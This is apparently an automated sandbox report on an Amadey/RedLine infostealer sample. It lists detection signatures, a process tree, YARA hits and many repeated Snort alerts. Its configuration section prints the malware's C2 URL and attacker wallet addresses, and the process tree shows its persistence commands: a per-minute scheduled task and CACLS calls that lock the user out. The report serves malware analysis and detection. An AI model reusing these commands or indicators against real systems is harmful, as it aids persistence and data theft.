Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:801767
MD5:3c86571f94ae2a9b196c945890c4d48a
SHA1:7bb15580dc7270573c9d1f76c78133b6f049c9d4
SHA256:f3d60db1572877967d2c8a48d1a41c40f40ad459b1965eb959494ade84a22ca2
Tags:Amadeyexe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Contains functionality to detect virtual machines (SLDT)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5092 cmdline: C:\Users\user\Desktop\file.exe MD5: 3C86571F94AE2A9B196C945890C4D48A)
    • bmKg.exe (PID: 780 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe MD5: 243D9E7FA50F53508036E1579B603367)
      • aTaf.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe MD5: 7A0C89DA78468AC421B2B1CD1A36DEE9)
      • nika.exe (PID: 2376 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 404 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 920 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5860 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 992 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 1016 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 2904 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 5916 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 1028 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4212 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 4132 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 3292 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5936 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4852 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5668 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 4276 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1e9d0:$s5: delete[]
                  • 0x1de88:$s6: constructor or from DllMain.
                  0000001A.00000002.658498410.0000000000D51000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    Click to see the 19 entries
                    SourceRuleDescriptionAuthorStrings
                    9.2.mnolyk.exe.d50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      22.0.mnolyk.exe.d50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        2.3.aTaf.exe.540000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          2.3.aTaf.exe.540000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                          • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                          • 0x1e9d0:$s5: delete[]
                          • 0x1de88:$s6: constructor or from DllMain.
                          19.2.mnolyk.exe.d50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            Click to see the 18 entries
                            No Sigma rule has matched
                            Timestamp:192.168.2.462.204.41.449959802027700 02/08/23-17:38:41.059224
                            SID:2027700
                            Source Port:49959
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450094802027700 02/08/23-17:39:19.127296
                            SID:2027700
                            Source Port:50094
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450226802027700 02/08/23-17:39:53.716250
                            SID:2027700
                            Source Port:50226
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449705802027700 02/08/23-17:37:26.868385
                            SID:2027700
                            Source Port:49705
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450033802027700 02/08/23-17:39:04.293934
                            SID:2027700
                            Source Port:50033
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450287802027700 02/08/23-17:40:08.597775
                            SID:2027700
                            Source Port:50287
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450128802027700 02/08/23-17:39:27.718211
                            SID:2027700
                            Source Port:50128
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450324802027700 02/08/23-17:40:19.866231
                            SID:2027700
                            Source Port:50324
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449766802027700 02/08/23-17:37:44.075524
                            SID:2027700
                            Source Port:49766
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449864802027700 02/08/23-17:38:16.250245
                            SID:2027700
                            Source Port:49864
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450131802027700 02/08/23-17:39:28.471918
                            SID:2027700
                            Source Port:50131
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450189802027700 02/08/23-17:39:44.828385
                            SID:2027700
                            Source Port:50189
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449803802027700 02/08/23-17:37:55.306674
                            SID:2027700
                            Source Port:49803
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449901802027700 02/08/23-17:38:25.224383
                            SID:2027700
                            Source Port:49901
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449892802027700 02/08/23-17:38:23.070647
                            SID:2027700
                            Source Port:49892
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449990802027700 02/08/23-17:38:53.902748
                            SID:2027700
                            Source Port:49990
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450061802027700 02/08/23-17:39:11.150219
                            SID:2027700
                            Source Port:50061
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449799802027700 02/08/23-17:37:53.714298
                            SID:2027700
                            Source Port:49799
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449897802027700 02/08/23-17:38:24.270543
                            SID:2027700
                            Source Port:49897
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449794802027700 02/08/23-17:37:50.997871
                            SID:2027700
                            Source Port:49794
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449738802027700 02/08/23-17:37:37.329606
                            SID:2027700
                            Source Port:49738
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449836802027700 02/08/23-17:38:03.530213
                            SID:2027700
                            Source Port:49836
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449934802027700 02/08/23-17:38:35.008002
                            SID:2027700
                            Source Port:49934
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450066802027700 02/08/23-17:39:12.352601
                            SID:2027700
                            Source Port:50066
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450164802027700 02/08/23-17:39:36.434453
                            SID:2027700
                            Source Port:50164
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450262802027700 02/08/23-17:40:02.469570
                            SID:2027700
                            Source Port:50262
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449741802027700 02/08/23-17:37:38.059835
                            SID:2027700
                            Source Port:49741
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449995802027700 02/08/23-17:38:55.087422
                            SID:2027700
                            Source Port:49995
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450156802027700 02/08/23-17:39:34.495754
                            SID:2027700
                            Source Port:50156
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449987802027700 02/08/23-17:38:52.696926
                            SID:2027700
                            Source Port:49987
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450103802027700 02/08/23-17:39:21.322750
                            SID:2027700
                            Source Port:50103
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449733802027700 02/08/23-17:37:36.045612
                            SID:2027700
                            Source Port:49733
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449869802027700 02/08/23-17:38:17.481259
                            SID:2027700
                            Source Port:49869
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450197802027700 02/08/23-17:39:46.717263
                            SID:2027700
                            Source Port:50197
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450329802027700 02/08/23-17:40:21.110664
                            SID:2027700
                            Source Port:50329
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449906802027700 02/08/23-17:38:26.442985
                            SID:2027700
                            Source Port:49906
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449811802027700 02/08/23-17:37:57.197655
                            SID:2027700
                            Source Port:49811
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449828802027700 02/08/23-17:38:01.248597
                            SID:2027700
                            Source Port:49828
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450038802027700 02/08/23-17:39:05.523813
                            SID:2027700
                            Source Port:50038
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450192802027700 02/08/23-17:39:45.528132
                            SID:2027700
                            Source Port:50192
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450234802027700 02/08/23-17:39:55.624345
                            SID:2027700
                            Source Port:50234
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449921802027700 02/08/23-17:38:30.054351
                            SID:2027700
                            Source Port:49921
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449786802027700 02/08/23-17:37:48.848861
                            SID:2027700
                            Source Port:49786
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449884802027700 02/08/23-17:38:21.133806
                            SID:2027700
                            Source Port:49884
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449746802027700 02/08/23-17:37:39.277464
                            SID:2027700
                            Source Port:49746
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450013802027700 02/08/23-17:38:59.416856
                            SID:2027700
                            Source Port:50013
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450074802027700 02/08/23-17:39:14.260435
                            SID:2027700
                            Source Port:50074
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449918802027700 02/08/23-17:38:29.354200
                            SID:2027700
                            Source Port:49918
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450246802027700 02/08/23-17:39:58.556275
                            SID:2027700
                            Source Port:50246
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450267802027700 02/08/23-17:40:03.678070
                            SID:2027700
                            Source Port:50267
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449970802027700 02/08/23-17:38:46.821273
                            SID:2027700
                            Source Port:49970
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450218802027700 02/08/23-17:39:51.780000
                            SID:2027700
                            Source Port:50218
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450184802027700 02/08/23-17:39:43.643716
                            SID:2027700
                            Source Port:50184
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449954802027700 02/08/23-17:38:39.826367
                            SID:2027700
                            Source Port:49954
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450282802027700 02/08/23-17:40:07.406029
                            SID:2027700
                            Source Port:50282
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450111802027700 02/08/23-17:39:23.277592
                            SID:2027700
                            Source Port:50111
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449856802027700 02/08/23-17:38:12.965502
                            SID:2027700
                            Source Port:49856
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449700802027700 02/08/23-17:37:25.618450
                            SID:2027700
                            Source Port:49700
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449939802027700 02/08/23-17:38:36.225912
                            SID:2027700
                            Source Port:49939
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449851802027700 02/08/23-17:38:10.567171
                            SID:2027700
                            Source Port:49851
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450221802027700 02/08/23-17:39:52.520097
                            SID:2027700
                            Source Port:50221
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450304802027700 02/08/23-17:40:12.743685
                            SID:2027700
                            Source Port:50304
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449848802027700 02/08/23-17:38:09.783238
                            SID:2027700
                            Source Port:49848
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450176802027700 02/08/23-17:39:39.790671
                            SID:2027700
                            Source Port:50176
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450337802027700 02/08/23-17:40:23.085156
                            SID:2027700
                            Source Port:50337
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450046802027700 02/08/23-17:39:07.465500
                            SID:2027700
                            Source Port:50046
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450213802027700 02/08/23-17:39:50.554966
                            SID:2027700
                            Source Port:50213
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449889802027700 02/08/23-17:38:22.355002
                            SID:2027700
                            Source Port:49889
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450005802027700 02/08/23-17:38:57.463506
                            SID:2027700
                            Source Port:50005
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450254802027700 02/08/23-17:40:00.514767
                            SID:2027700
                            Source Port:50254
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450259802027700 02/08/23-17:40:01.724392
                            SID:2027700
                            Source Port:50259
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450000802027700 02/08/23-17:38:56.276223
                            SID:2027700
                            Source Port:50000
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449718802027700 02/08/23-17:37:30.060143
                            SID:2027700
                            Source Port:49718
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449967802027700 02/08/23-17:38:46.093677
                            SID:2027700
                            Source Port:49967
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450295802027700 02/08/23-17:40:10.522022
                            SID:2027700
                            Source Port:50295
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450041802027700 02/08/23-17:39:06.234295
                            SID:2027700
                            Source Port:50041
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450018802027700 02/08/23-17:39:00.633703
                            SID:2027700
                            Source Port:50018
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449713802027700 02/08/23-17:37:28.821552
                            SID:2027700
                            Source Port:49713
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449926802027700 02/08/23-17:38:31.519366
                            SID:2027700
                            Source Port:49926
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450148802027700 02/08/23-17:39:32.593659
                            SID:2027700
                            Source Port:50148
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449754802027700 02/08/23-17:37:41.168561
                            SID:2027700
                            Source Port:49754
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449962802027700 02/08/23-17:38:41.870045
                            SID:2027700
                            Source Port:49962
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450290802027700 02/08/23-17:40:09.328461
                            SID:2027700
                            Source Port:50290
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450332802027700 02/08/23-17:40:21.859053
                            SID:2027700
                            Source Port:50332
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450180802027700 02/08/23-17:39:42.064684
                            SID:2027700
                            Source Port:50180
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450082802027700 02/08/23-17:39:16.214186
                            SID:2027700
                            Source Port:50082
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449876802027700 02/08/23-17:38:19.187751
                            SID:2027700
                            Source Port:49876
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449974802027700 02/08/23-17:38:47.760275
                            SID:2027700
                            Source Port:49974
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450171802027700 02/08/23-17:39:38.199718
                            SID:2027700
                            Source Port:50171
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449787802027700 02/08/23-17:37:49.088688
                            SID:2027700
                            Source Port:49787
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449726802027700 02/08/23-17:37:33.198314
                            SID:2027700
                            Source Port:49726
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450152802027700 02/08/23-17:39:33.546078
                            SID:2027700
                            Source Port:50152
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450241802027700 02/08/23-17:39:57.341359
                            SID:2027700
                            Source Port:50241
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450250802027700 02/08/23-17:39:59.546506
